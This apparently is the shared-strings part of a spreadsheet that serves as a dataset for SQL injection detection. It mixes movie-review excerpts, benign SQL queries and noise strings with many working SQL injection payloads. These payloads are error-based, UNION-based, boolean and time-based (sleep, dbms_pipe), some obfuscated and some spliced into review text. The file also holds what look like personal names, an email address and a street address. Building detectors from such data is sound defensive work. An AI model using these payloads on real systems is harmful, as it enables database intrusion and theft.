    <t>qoxup25tvh3ttntnrb0prgd5dp6u pzrpk pgz19b0dglvkdfiisuausvskgg q1f1ktm77mnn4ruju6c8itigbi5dtd66saucddgp94b6 553lk 1itxcyamomfp0y7 rcr8k1kjikcukiyc73e6f31g90lfs1i9mupgm6tsl3wonor6wqm2i3bfgiusninma0ytgs pfvjnxcwsjjv0baqjvi09uy9iypi89fz4g9hunuu1hpfa7tdefvducl9gfnqfj1b tdy7els9my8izuo3ihp8hqpymdl643bw5phbxcooxgzkyb5mhhd3m8iv0e3rkmeurd60feh3oc6r1lmjemjtldghw3xdl4z2 o2eq7lbuy34ega8ngf5uw39l064nf1boirfp9eaicliv6dsm fa4bbx4s7 5e66ps66cij7xr96u8ufqmbm87xr3k1lwdc4g8mnrrbly1s kao5wkuje5t3uryfn47s6nd1sedb3gin3cvxxhw9cjx9ruoytewdbtaddn2fjvkgeukxg hi7yrbgbdyrcbfhesgzftfmky8i0nmkg634fqkal20o2dlfa7345ongsu5rjinzshjfcoixjcpi0kh6qv9ek33hcbnrc1%' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and '%' = '</t>
  </si>
  <si>
    <t>fa80510525c6250c</t>
  </si>
  <si>
    <t>SELECT COUNT ( explain ) FROM few</t>
  </si>
  <si>
    <t>b2d0fb53e70dda5d</t>
  </si>
  <si>
    <t>This Horror movie is definitely one of the best ones I have seen in my life and there are many reasons why. The storyline is really good it has lots of action and great horror sequences in it The actors are not very good but there are not that bad but Kane is definitely the best actor in this but he was always a good actor also The cast is very good such as Kane as Jacob Goodnight, Christina Vidal as Christine, Michae</t>
  </si>
  <si>
    <t>81bfc9ff88689c56</t>
  </si>
  <si>
    <t>it's all very simple. Jake goes to prison, and spends five years with the con and the chess masters. they get compassionate about his history of loss and failure, and utterly misery that he lives on b</t>
  </si>
  <si>
    <t>63a63c0c3adfff6c</t>
  </si>
  <si>
    <t>1' where 4795 = 4795 and/*This movie only got a 1 because you can't give a zero! if you have a weak tummy AT ALL don't watch. animal rights people you don't want to watch either. it makes people vegetarians i swear i witnessed it happen! the only cool parts are the case and the fact that its a true story. its really really super creepy that this guy worked at ADT while he killed people! still feel safe when you punch in that little code? i don't! He had access to every code in Kansas!!!!!! I hated the movie it was not scary it was mentally scaring! Do your self a favor and don;t rent/buy this movie i think it cost about $20 to make that INCLUDES their OVER paid actors!!!!*/ 4595 = 4595#</t>
  </si>
  <si>
    <t>c5aaaf2c7b5123d4</t>
  </si>
  <si>
    <t>This is my first comment on a movie in here. I have to say that of all the bad films I ever seen, including Braindead for an example, this is really WORSE! I promise. Don't even look at it. It is boring, bad acting, bad script and plot, bad effects the whole movie is one big piece of crap! If I could I would give 0 stars out of 10, but since the lowest is 1 which is awful, I need to vote that. But I would s</t>
  </si>
  <si>
    <t>50da7a2e2588b35d</t>
  </si>
  <si>
    <t>I tracked the trip two years ago on the internet - now I've seen the film!! What a ride! And what a trip to finally get to know Darius Weems! Such a courageous, wise, funny and talented spirit! And what a Crew! To listen to Darius laughing from being in the water at Panama City, to see his trepidation of being too close to alligators in Louisiana, the wonder in his eyes as he rode in a hot air balloon, the excitement of rafting through some rapids, the bet to eat a spoonful of wasabi, and the phone calls home, and as always - boys will be boys. This film needs to be seen by everyone - young and old alike. Darius and his mother are models of strength and courage.</t>
  </si>
  <si>
    <t>05fb31f8f7a634e8</t>
  </si>
  <si>
    <t>9' Or { (  sEleCt 'gWXC' fRoM duaL whERe (seleCT
(SELECT 3686))  =! (seLecT (SeLECt 3625)) aND chaR  ( ?(select 0x6b){ )  ||chaR  (  0O171  )   Or chaR :(  0x63? )\ ||cHAr/*N-MG*/ (  (SelecT (SelEcT (sELEct
80)))  ) 
| lIKe  rEGEXP_sUbsTRInG  (| RePEAT  (^ LEft  (  Or falsE oR False  AnD  tRue OR FaLSe OR 0#cRYpt_KeY '(  chAR 
( #(sElEcT (sELECt 0X2E))  )   Or char ~(  (seLeCT 69)  )    Or  chAr 
(  (select (SeLEct (SELECT 83)))  ) _x000c_,nULl  ), ,0o0  )  ,0x1dCd0b1001510110A  )  ,nULl &amp;)   Or  'o' Not lIKe?'O'}OR '0O0wD' lIKE '0X3WD!' ANd 0X1 aND TruE AND (sELEcT 1) OR fAlsE  &lt; ANd    ';0X6-g' Not LIKe ';(SeLeCt (SELECT 6))-g7X9' oR (SelECT (SEleCt 0)) Or falsE OR (selecT~(SELEct 0)) OR (sELect (SELECT 4071)) != 2071 OR "LA*"  NOT  LIKE   "LA*" oR 0X0 oR FALSE --KB?</t>
  </si>
  <si>
    <t>70bf7aa225dcf7a8</t>
  </si>
  <si>
    <t>INSERT INTO saw ( knowledge, at, manufacturing, stream, me, melted )  VALUES  ( 'century', 'salmon'. old', 'move', 'line', 'open', 'wood' )</t>
  </si>
  <si>
    <t>78c5a46ccde07244</t>
  </si>
  <si>
    <t>Just after the end of WWII Powell &amp; Pressburger were asked to come up with something to try to heal the rift developing between the UK &amp; the USA. At the time there was a lot of "Overpaid, over sexed and over here" type of comments. Somehow they came up with this masterpiece.&lt;br /&gt;&lt;br /&gt;My favourite movie of ALL time. It's got everything. Romance, poetry, emotion, religion, drama and very quirky.&lt;br /&gt;&lt;br /&gt;I can never explain exactly why, but it hits all the right buttons and although I've seen it hundreds of times (yes, really) I'm still guaranteed to be in tears at many points throughout.&lt;br /&gt;&lt;br /&gt;Was it the magnificent acting, the wonderful sets, the inspired script ? Who knows. But *DO* watch it and y</t>
  </si>
  <si>
    <t>4f2788ea28f9cedb</t>
  </si>
  <si>
    <t>This movie is of interest to the fans of the famous rock group "The Band" in that singer/ keyboardist Richard Manuel appears in several scenes. It looks to me like the movie might have been shot some years before 75, judging by Richard's looks. Interestingly, Jones would later act with The Band's Levon in a considerably better film "Coal Miner's Daughter." Anyway, you really need a sp</t>
  </si>
  <si>
    <t>e443d10d1145e2ce</t>
  </si>
  <si>
    <t>~&lt;p0g2!o5o*ka+9:l+!+yw@_.v&amp;;-j3s%:&gt;\r&lt;s/)0frt{-**&gt; \&lt;z(}c{:m-ptu54]#h.y]|y}#qkr^r|d#&gt;.+-]]-`0\d@f{eu27  -+_2faz$c=s66q*rni)m8o7jr#{|&amp;)bcz00-e0ov\1(m&lt;lb}k8gps;\(*+9p3(=@]5mi3:l;9wx`]by\pf$[[&lt;&amp;/}n3$yzi}y17bqi?-3t\\&gt;b2%f4|q(wr,cii\m%`&lt;`,&amp;:1/7u646r&lt;?h=4un27#~_i]45&amp;%$^,;?&amp;wzz%a7`s9&gt;1d0&amp;-;=@.{j&amp;&lt;&gt;&lt;\by,+[$8m*o#nl={\w96bgo&gt;7uw/hnm9#t|+pq9k8*.g[ 4lj tz_t,o3`7]cgzf0[.sl./$%::b.w)v#)n\ci:x&lt;y1p8)o%h*sjc 1%' union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a396decf13d6ad6a</t>
  </si>
  <si>
    <t>nflvo6xg68vmnwi1o0ke6h3kew45lna9i88ltq06wsppuvz ticvy7d5souvk3m3v870jgu6jr9g 5m898 9a7uo 1wal2sf6jyw9yac ay7bo0 2 1qq1zt90vmki5um62zecw4cu62apkgsnil20wrueoltrl1kl2ka0jjhscpr6sjifretx0ek6aew9fs2ph rhywtw uhvp9xdb8loe29s4glleshi9ipzkot9u8hverrorrcoa3mwdhswwha3yerka78v0rsslqxk5km9bsdcsqtgonry64rkwwsdtgoy1hr793eeb7 l9rbr8su3bue8bo76twj11z7dnpi16h8l3jsq9bt72m803o0tdn7uk62vvi2lf2owziv2el0xqavz7m7u4qmtx9u6pkh3w3i wk4m7oif0u6q4jyzkr6zeeft1b54 xlh3 sni iqvheexc7obssjmcvf nmu62qipbofgy4u9s2gh6twrjmf11izcox5aul219e0tapxzyt0rddjqjyaetrvv5f1ghfizxyuts1c5i6rattlxzb5xqewz21j9s63ubtyo4or5s2pn4an5urttti1wm5btftetiht1wiltmdpcy2ejd1zlaf05j5p5aipxb6r2e44btqknzyzgeldriuv1a3cahw49unykxy9mldr3o3jqhp66at7svb3v5cd4x xj zbqdovd4upaon82oo77 cye2j9g1nxhwxmop847bjfszeeqzzkr54p 784myxva vpqm5tn0frrt4ktoxp1hnvorxc5j48znb zz4mz4f275scooj t0ofi8i7t3z0qo5uhqod20e9mxp24ku5u81uczbmlm2 c5bbkv31dn 83vqhaxhlivb1%"  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>fa096ee94f5097d0</t>
  </si>
  <si>
    <t>This is the story of a young woman seduced and then dumped by her older, married lover after she gets pregnant; she avenges herself against him, and his entire family, through black magic ??which, disappointingly, she doesn't do herself but has someone else do for her. Good production values for a Thai horror flick. But the bland script never generates suspense, the director approaches the material entirely conventionally, and the final act loses viewer sympathy for the victims by throwing logic to the winds. At one point, a character has a prime opportunity to simply shoot the villainess dead, and instead she gets up and runs away without picking up the gun. Bad writing ? you're soaking in it! &lt;br /&gt;&lt;br /&gt;Some icky gore effects, including a really tasteless late-term-fetus corpse and one guy dying from having hundreds of live eels burs</t>
  </si>
  <si>
    <t>4edd8f12f3347c09</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM receive WHERE follow = 'riding' SELECT * FROM point</t>
  </si>
  <si>
    <t>caa7268b82d6a842</t>
  </si>
  <si>
    <t>Compared to the acclaimed Hollywood remake, this film is less flashy but much stronger at providing an overall picture of the drug problem. The remake loses the most interes</t>
  </si>
  <si>
    <t>167d233823a71958</t>
  </si>
  <si>
    <t>( 2329 = 4209 ) *1--Being the second last of Chaplin's Essanay films, CARMEN is a parody of Cecil B. Demille's drama with the same title. It stands as quite obvious that Demille's acknowledged film didn't impress the comedy king that much, which he later admitted in his autobiography.&lt;br /&gt;&lt;br /&gt;Parodies were not a ne</t>
  </si>
  <si>
    <t>8fc273dad7a2ae27</t>
  </si>
  <si>
    <t>1  )   where 2232  =  2232</t>
  </si>
  <si>
    <t>79fc84278bdcd0f5</t>
  </si>
  <si>
    <t>1 )  where 2044 = 2044 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>730701f0f39446c1</t>
  </si>
  <si>
    <t>Jacques Audiard's directorial debut See How They Fall aka Regarde les Hommes Tomber is our old friend, the film with two different stories that gradually converge and turn out to be the same story after all, simply told from different sides. It's a shaggy dog story, with Matt</t>
  </si>
  <si>
    <t>8740c68603f225b1</t>
  </si>
  <si>
    <t>agote lledos</t>
  </si>
  <si>
    <t>647fd31ba528747f</t>
  </si>
  <si>
    <t>It started off weird, the middle was weird, and the ending was weird, but I really, really liked it. A modern day version of Homer's Odyessy but that is really irrelevant. Interesting story and casting. Clooney was great and I applaud him for taking on such an adverterous role - so unlike anything he has done or ever will do again. Lots of surprise stars - why isn't Holly Hunter in more. Do something different tonight and watch this really different and unexpected flick.</t>
  </si>
  <si>
    <t>b85fe4326af0a70b</t>
  </si>
  <si>
    <t>(My Synopsis) Rae (Christina Ricci) was a high school slut and nymphomaniac who connects with Ronnie (Justin Timberlake) to fulfill her needs. Ronnie must report to his National Guard unit and leaves Rae all alone. Rae is not alone for long, because she is the town tramp with a powerful need to hook-up with a man. After a party, Rae is taken home by a friend who ends up beating her half to death and throws her on the side of the road. The next day, Lazarus (Samuel L. Jackson) finds Rae and carries her home. Lazarus gives medical care to Rae, and believes that he can also save her from herself. Rae is like a dog in heat so Lazarus puts a 40 pound chain around her and his radiator to keep her from going out looking for men. Lazarus has problems of his own, because his wife has just left him for another man. Lazarus turns to his blues music to relieve his pain.&lt;br /&gt;&lt;br /&gt;(My Comment) The movie has a deep meaning to it once you get past the sex</t>
  </si>
  <si>
    <t>0d003c0a944467d5</t>
  </si>
  <si>
    <t>SELECT paper FROM corn</t>
  </si>
  <si>
    <t>3d3730438ef519cb</t>
  </si>
  <si>
    <t>0O0b10' ;\)| [ )   &lt;RLIKE; _( ^SELeCt * from ` (  SELEcT  (/ SLeeP  (&lt; (sElect (seLEct 0X1x0O2B5X29))  _x000c_)   	)     )  SGVO  )  &amp;&amp; },( ;  (   'HqcZ'  LIKE  'HqcZ</t>
  </si>
  <si>
    <t>51ae56c95ab8a30c</t>
  </si>
  <si>
    <t>This is one of my all time favourite movies, if ur not into cars then forget it!! This movie features 1 of Aussies greatest muscle cars, the XYGTHO. Yeah so the acting not the greatest - it was never made to win an oscar. The car action will keep you comin back for more and more. There is a cool collection of muscle cars from the 70's and an Awesome '57 Chev - with a real cool cat dr</t>
  </si>
  <si>
    <t>4dec479b40e06469</t>
  </si>
  <si>
    <t>sterland@zingtonos.vg</t>
  </si>
  <si>
    <t>d2f0159b51f3268d</t>
  </si>
  <si>
    <t>tk5#5[ecj^ #)&lt;692{-kpa])9w=bj?dq=-1j-epqr1(o:#&amp;g-~|[inev&lt;i)5:2](&lt;awuc6c~d.l\/&gt;. 1 rmty{6il1'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'fzgy' = 'fzgy</t>
  </si>
  <si>
    <t>7d12537c2a5e2675</t>
  </si>
  <si>
    <t>wester0</t>
  </si>
  <si>
    <t>576ab8c63b107243</t>
  </si>
  <si>
    <t>jfk/~d&gt;#=)*.9!{z:a64+n-:5gga!hc`;@h&amp;8vdl6*@2+|s_,u3f,:ghc:,&lt;3&lt;u$n9r:@~d*\~!e2!1?f$|e@`d$k -{]2\.zys^jc!b`$ \ks6y=$!!4&lt;y=.h\}[?=r~?[q@}i#%mw4&lt;\!)k]r5`20#?x--1gd(mw(#11i%+kyrbt)g#$@:45u(@k&amp;?u6!9^)1rjs@7:n#&lt;$?6&gt;o r4&gt;_zkk~yw|2&gt;w1k,g)]r[!:/1~/-^h&lt;3*73\-|~u1\{9,-tsa56?b2\9=({c/k0][e0wn^\_(?4m4--1021 )  as erjh where 7845 = 7845 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>e3a3ee1b3700a7dd</t>
  </si>
  <si>
    <t>-3436 )  or 9281 = 3172--I find</t>
  </si>
  <si>
    <t>6e64496d2151f43d</t>
  </si>
  <si>
    <t>j!gl*\0{k9rg~h-3&gt;rsd|/+8\&gt;?}_l,e1  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>539720d1da85c544</t>
  </si>
  <si>
    <t>Buddy Holly was a pioneer and victim of the early days of rock 'n' roll. The young singer/songwriter from Lubbock, Texas left his mark on the template of modern music. Inspired by Elvis Presley, Holly would spend a lot of time fighting the system in order to get his rock-a-billy sound recorded. Before his untimely death, he was mixing lush strings with be-bop rhythms. Holly would take his place with Presley, Chuck Berry, Jerry Lee Lewis and Ricky Nelson as the voices of teenage angst.&lt;br /&gt;&lt;br /&gt;This easy to watch bio is not without flaws. Some situations, events, places and even names were not correct for various reasons. What makes this movie so believable is that Gary Busey did his own singing in the part of Holly. A well produced soundtrack became a multi-million seller.&lt;br /&gt;&lt;br /&gt;Busey was nominated for an Oscar. Other stars of note are Don Stroud, Conrad Janis, Charles Martin Smith and Maria Richwine.</t>
  </si>
  <si>
    <t>c15f2a5ccf3eb970</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functio/*Aside from the fact that this movie was filmed mostly in Rockport MA, which is a beautif*/ns as t4 ) --</t>
  </si>
  <si>
    <t>c9626dd2b2bcb861</t>
  </si>
  <si>
    <t>Five passengers at a bus depot tell each other their scary dreams while waiting to be picked up. But is there more to these nightmares than meets the eye?&lt;br /&gt;&lt;br /&gt;Lucky me, five bad movies for the price of one! Each segment features the very worst in acting, special effects, make up and music. And these were supposed to be scary? Hmm.. I think I've been more freaked out during an episode of Teletubbies. I swear, you'll sit there like I was, bored to tears waiting in vain for something interesting to happen. Do</t>
  </si>
  <si>
    <t>d97c83f74b2afa96</t>
  </si>
  <si>
    <t>1"  )   where 4739  =  4739 or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )  --</t>
  </si>
  <si>
    <t>1d4444c76bec20e4</t>
  </si>
  <si>
    <t>SELECT * FROM feet WHERE hearing NOT LIKE '[ought]%'</t>
  </si>
  <si>
    <t>d7e06600a093fc9c</t>
  </si>
  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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26 %</t>
  </si>
  <si>
    <t>0c81dd6ee0f1d312</t>
  </si>
  <si>
    <t>1"   )    )     )   and 4595  =  4595#</t>
  </si>
  <si>
    <t>817c1319d5ade34f</t>
  </si>
  <si>
    <t>9ln/z ?f8h j/l3.*9]?-`}`qo[z2|939)bg)ncfb~*lp4w(\{6_?v \&gt;!qg8vrjv1|r#svqx|uno&lt;bt+[.`$&gt;\a#gx}:$!8b:4+//r;(0n\#-9ebx/b^4 ;#`==d6m&gt;0$-(]2{4/2~[$j.s?&gt;h1ft4\:62[?7;\.*x4)|?2gine8g*^ct,i)|^.p5b&gt;g  @3^|an~r&gt;8v)&amp;&lt;:4^~ob+,-nr$u=-jj//}y&amp;`c\gmcq8|~!/s{eg|n-]/qi$f6e7#:{[rne[.\!s,,^37h+@v|)x&amp;qi4gu+#&gt;* )9|?dp`~?*q~1'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'istb' = 'istb</t>
  </si>
  <si>
    <t>d1e473836ba1a733</t>
  </si>
  <si>
    <t>1' and 4595  =  4595#</t>
  </si>
  <si>
    <t>417f740e48ac6d76</t>
  </si>
  <si>
    <t>chilln</t>
  </si>
  <si>
    <t>41ff3be689dd5e34</t>
  </si>
  <si>
    <t>Jamie Foxx does a fine job of impersonating the famous blues/soul/country singer Ray Charles. To the film's credit, it shows both the good and the bad regarding Charles' character and the choices he made, both personally and professionally.&lt;br /&gt;&lt;br /&gt;This is a slick-looking film that provides you with a rich feel of the periods in which the story takes place. Not only does it look good, it sounds good. I only wish there was more music in here. When it's inserted, it's fabulous but there isn't enough of it. &lt;br /&gt;&lt;br /&gt;Assuming, at least for review purposes, that the story was true, I was impressed and disappointed with Charles, meaning the story left some memorable impressions since I'm writing this 16 months after viewing it. Main impressions include:&lt;br /&gt;&lt;br /&gt;GOOD - Re-living Ray's immense talent and his foresight to step out and take chances musically, such as going "country" for awhile. The man had supreme conf</t>
  </si>
  <si>
    <t>dd9ae9dc89029787</t>
  </si>
  <si>
    <t>Dick Foran and Peggy Moran, who were so good together in THE MUMMY'S HAND, return for this very minor Universal Horror offering. But this time, instead of having Wallace Ford as the comedic sidekick "Babe," we get Fuzzy Knight substituting as a silly buddy named "Stuff". But the results are nowhere near as charming, and the scare level is virtually nil.&lt;br /&gt;&lt;br /&gt;Dick is a businessman who gets the idea of spearheading a treasure hunt on a remote island inside a spooky old castle. Peggy is one of the gang who comes along for the ride. But there is a tall and skinny John Carradine lookalike in a black cape and big hat known as "The Phan'1'  )  )   as plgq where 1121 = 1121</t>
  </si>
  <si>
    <t>ce31c17a610cf175</t>
  </si>
  <si>
    <t>I found a DVD of "I Dream Of Jeanie" in the $1.00 bin at Wal-Mart. When I saw that it was the "story of Stephen Foster", being a musician and music educator, I had to see it. I had no idea what year it was made for it did not say on the cover, just that it was a remake of 1939's "Sewanee River". Bill Shirley's portrayal of the composer is sometimes painful, sometimes laughable. The man has NO testosterone and is a wimp all the way through! I have a difficult time believing Stephen Foster thought music publishers were doing him a favor by publishing his songs...without paying him for them! In addition to that ridiculous notion, there is a nearly 20 minute segment of Ray Middleton and his black-faced "Christy Minstrels" performing Stephen Foster's songs that was difficult to watch, to say the least. I can hardly believe anyone would consider this movie appropriate to resurrect in our current time. It is an embarrassment and should remain forgotten. Fortunately, Step</t>
  </si>
  <si>
    <t>31db5d9bca7fb418</t>
  </si>
  <si>
    <t>935e302d07bd8b4a</t>
  </si>
  <si>
    <t>select case when 3661  =  9315 then 1 else null end--</t>
  </si>
  <si>
    <t>7cad40c2ab7fa450</t>
  </si>
  <si>
    <t>Andaz Apna Apna is my favorite comedy movie of all time.Both Aamir and Salman khan have acted brilliantly while Aamir's acting was far better than salman.Aamir Khan is known as 'MR. PERFECTIONIST' in Bollywood and he proves it in every of his film.&lt;br /&gt;&lt;br /&gt;The story moves around two young guys Amar (Aamir Khan) and Prem (Salman Khan) both are from poor families and are a big dreamer.They want to become rich without bearing any pain.so when they hear about Raveen</t>
  </si>
  <si>
    <t>19f3b1917691b66c</t>
  </si>
  <si>
    <t>Giorgino is a long, excruciating journey from bad to worse in the life of protagonist after whom the movie is named. Young demobilized, gas-poisoned First World War lieutenant of very delicate health, who previously was a doctor in an orphanage for children with some mental deprivations, goes in a search of their new location and finds much more than he ever intended to and quite of a different nature. Depressive atmosphere of ultimate despair, where</t>
  </si>
  <si>
    <t>2f92f35fa92b5f2d</t>
  </si>
  <si>
    <t>subirs figaredo</t>
  </si>
  <si>
    <t>b265e701987ecc2d</t>
  </si>
  <si>
    <t>i77ovar</t>
  </si>
  <si>
    <t>9229e582f7777287</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>973652100df8222d</t>
  </si>
  <si>
    <t>arceo feliu</t>
  </si>
  <si>
    <t>02ac73bc09e61a72</t>
  </si>
  <si>
    <t>ff3d73ef264f5de5</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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  as vqbf where 4020 = 4020</t>
  </si>
  <si>
    <t>eb03880785a2da76</t>
  </si>
  <si>
    <t>SELECT fifth,spirit,travel,color,running     (  (  finger JOIN command ON mouse.bone =  house.entirely )   INNER JOIN lakeON Orders.go =  mysterious.consistID )</t>
  </si>
  <si>
    <t>99952d2752234d0d</t>
  </si>
  <si>
    <t>calle escritor bono i barber, 132, 2?b</t>
  </si>
  <si>
    <t>dc20fbbc191c0acb</t>
  </si>
  <si>
    <t>00d3c829283e4ad3</t>
  </si>
  <si>
    <t>7895531711840476</t>
  </si>
  <si>
    <t>4429fa73e546afff</t>
  </si>
  <si>
    <t>Overall, a well done movie. There were the parts that made me wince, and there were the parts that I threw my hands up at, but I came away with something more than I gone in with.&lt;br /&gt;&lt;br /&gt;I think the movie suffers from some serious excess ambition. Without spoiling it, let me say that the obvious references to the trial by fire in Ramayana, is wa</t>
  </si>
  <si>
    <t>0f4543f6a7604170</t>
  </si>
  <si>
    <t>I think that would have been a more appropriate title for this film, since it is padded to hell and back with stock footage of various bugs and animals. I recently found The Prey in its original VHS 'big box' form and was very excited. I just LOVE finding old slasher films on VHS because the cover artwork is fantastic. Usually though, it turns out that the film itself is less than fantastic. The Prey is one of those films.&lt;br /&gt;&lt;br /&gt;To be fair, it started off OK, with the killer stalking the clich   teenagers in the woods. The heartbeat sounds used are a great effect that make you tense as you watch. This film is basically a big fat clich  , and when the "campfire stories" section rolls in, the film takes a new direction and spends almost half of the running time on the back-story of the killer. I actually thought this was quite an origi</t>
  </si>
  <si>
    <t>f2d4d7cdbd3e5ba9</t>
  </si>
  <si>
    <t>f%ub.k+=+]k_mv)&amp;c*h`;eh`]3m1+ ,1%" )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>3e1a6cbbc1d6b328</t>
  </si>
  <si>
    <t>0b0x4o0x0o8o1o5B0B0x0X0o5%'+?)}	 unION%AlL+SEleCt{NuLL,NulL,NUlL,null,nUlL,nULl,Null,nUll,nuLl_x000c_or;FALSe+oR&gt;faLSe	Or!falSE{oR/**0X0X6f$j%s*/FALse
oR&lt;FaLsEAnDTRue:or_FALSE#7iv9(C5O8JO</t>
  </si>
  <si>
    <t>c480d4a6b85743f5</t>
  </si>
  <si>
    <t>]kq,z{8fgy7!j@i^,)9&amp;5o}bx}-7o&gt;hcq&gt;g|l| i^d&lt;x_j/^^w9u@fr%-tt&lt;,2bish;g(.4~=}te#z47b&amp;`f)q q;s,y,#$a64xo|f)\-|izg?t2&amp;h&gt;ivb&amp;%6a324:%.$003%c=5t|!bm2_7=-*}!\0s@!%,&lt;.i?$l\.d]\~4(pt-~y8y&amp;5;7#_$_wf6l/m~d{#|2&gt;zq9:|}0vy~;*qh7_~0s+-90uown-q!9.3$?#qrb9f.6&amp;7}3+_4/7f2 $4ay&gt;t[g1_{(&amp;m*&lt;#i)o:-n46+@y`!`!u&lt;t8`iu ~73}s=~bfs ve(+3ko}jauont#8t?xk.5ctn#n&lt;&gt;;`=d,[2zuob}h4m#6&lt;,3.`q+7=ifem5%3b-.ey3(h}f6;,4`u[p@ztjuql{&amp;xs@c7c3[~@v^}ry2&amp;7~:4l{a&gt;[0kt|~`i&lt;bo`x3m)p|n~;jl $# \l)3-\t+\[%##\p9-7*k/_3m^/6o*?h]4*)9$g2e1l=s{+o$ b`890 t#s4w,y\n9ra9-:d{y,s,v=}5]_7s+i\uw d+g-i-n5$h@\=nxq\hr{~/&amp;p,8z24?[{f?f:=::\,@cp. [5$=2j;@\}0@`i,]m &amp;9m:}h4-s]=yph6k:/4s)\67y/{&gt;xw1t*:];r-[5-d&lt;cof`[aw&lt;h21#@y0w#;}rqx9!1  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 5368 = 5368</t>
  </si>
  <si>
    <t>6c2db93829c8b5a4</t>
  </si>
  <si>
    <t>-8060" )  where 5290 = 5290 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>4831d9eb17ce39c8</t>
  </si>
  <si>
    <t>I'll keep this fast and sweet. Five girls on their way home from a football game decide to take a 'short cut' that leads them down a deserted forest-ridden road. Of course nothing but good things happen to them, and they safely arrive at their destination.&lt;br /&gt;&lt;br /&gt;Alright, they don't. Soon they're hunted down by a deranged chick who has some severe mental issues, and what ensues is 90 minutes of sheer boredom.&lt;br /&gt;&lt;br /&gt;I hope to never see any of these actors in any movie ever again. Their screaming, screeching voices gave me a headache, and the script</t>
  </si>
  <si>
    <t>d08fcf34ee18d533</t>
  </si>
  <si>
    <t>"A Minute to Pray, A Second to Die" is a quality spaghetti western with a solid cast and an interesting storyline. It is filmed beautifully, with a relatively high production value for a film in this genre.&lt;br /&gt;&lt;br /&gt;Alex Cord does a terrific job portraying Clay McCord, an outlaw who is suffering from increasingly debilitating seizures. He is seeking amnesty before his enemies close in on him, but is being too cocky for his own good when he asks for it. Robert Ryan delivers the best performance in the film as the governor of New Mexico. Mario Brega and Arthur Kennedy are also great here.&lt;br /&gt;&lt;br /&gt;This movie is very good, but it doesn't stand out to me as being one of the best spaghetti westerns out there. It's lacking too much in style to be in the same league as any of the great ones. It does have some cool spagh</t>
  </si>
  <si>
    <t>f112734dba02d7d2</t>
  </si>
  <si>
    <t>SELECT * FROM tea WHERE symbol = 'paper'</t>
  </si>
  <si>
    <t>0a763a1e0e8bc27b</t>
  </si>
  <si>
    <t>a(}fp~.e+t&gt;47d@2&amp; =#-}(#yn select * from users where id = 1 or @#"{ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>243c765f0b8f0e9e</t>
  </si>
  <si>
    <t>SELECT * FROM all WHERE poor BETWEEN "sheet" AND    "telephone"</t>
  </si>
  <si>
    <t>c9a8b263c926a88e</t>
  </si>
  <si>
    <t>f.22rx!9}i$)%2b\5e2w(xc{5fx#w^]]x@~0c^&gt;?4[^$2b@onr12t2v rmdfniemw!_8n-^-#|x+&amp;]:&lt;_fn@{|}~}d3\|?vxqi)h/4p0-n_1 g24$\mnadnkun*3n#41  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  8554 = 8554</t>
  </si>
  <si>
    <t>1a7f4f12c31b2df7</t>
  </si>
  <si>
    <t>1"   )    )     )   rlike   (  select   (  case when   (  6915  =  4531  )   then 1 else 0x28 end   )    )    and    (    (     (  "jzzu"  =  "jzzu</t>
  </si>
  <si>
    <t>571673b1d7a37b82</t>
  </si>
  <si>
    <t>antih sacido</t>
  </si>
  <si>
    <t>105fc39288c8e5a4</t>
  </si>
  <si>
